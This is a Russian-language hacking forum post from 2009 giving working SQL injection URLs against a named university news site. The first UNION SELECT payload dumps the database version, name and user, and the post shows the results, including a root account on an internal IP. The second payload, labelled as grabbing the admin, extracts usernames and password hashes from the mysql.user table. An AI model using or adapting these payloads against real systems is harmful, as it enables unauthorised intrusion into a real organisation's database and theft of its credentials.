Показать сообщение отдельно

  #6  
Старый 13.02.2009, 19:45
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами: 9116712

Репутация: 688
По умолчанию

Код:
http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11--

Database Version : 4.1.21-standard
Database name : sagu_news
User name : root@192.168.0.2


берем админа:

Код:
http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat_ ws(0x3a, user,password),3,4,5,6,7,8,9,10,11+from+mysql.user--
 
Ответить с цитированием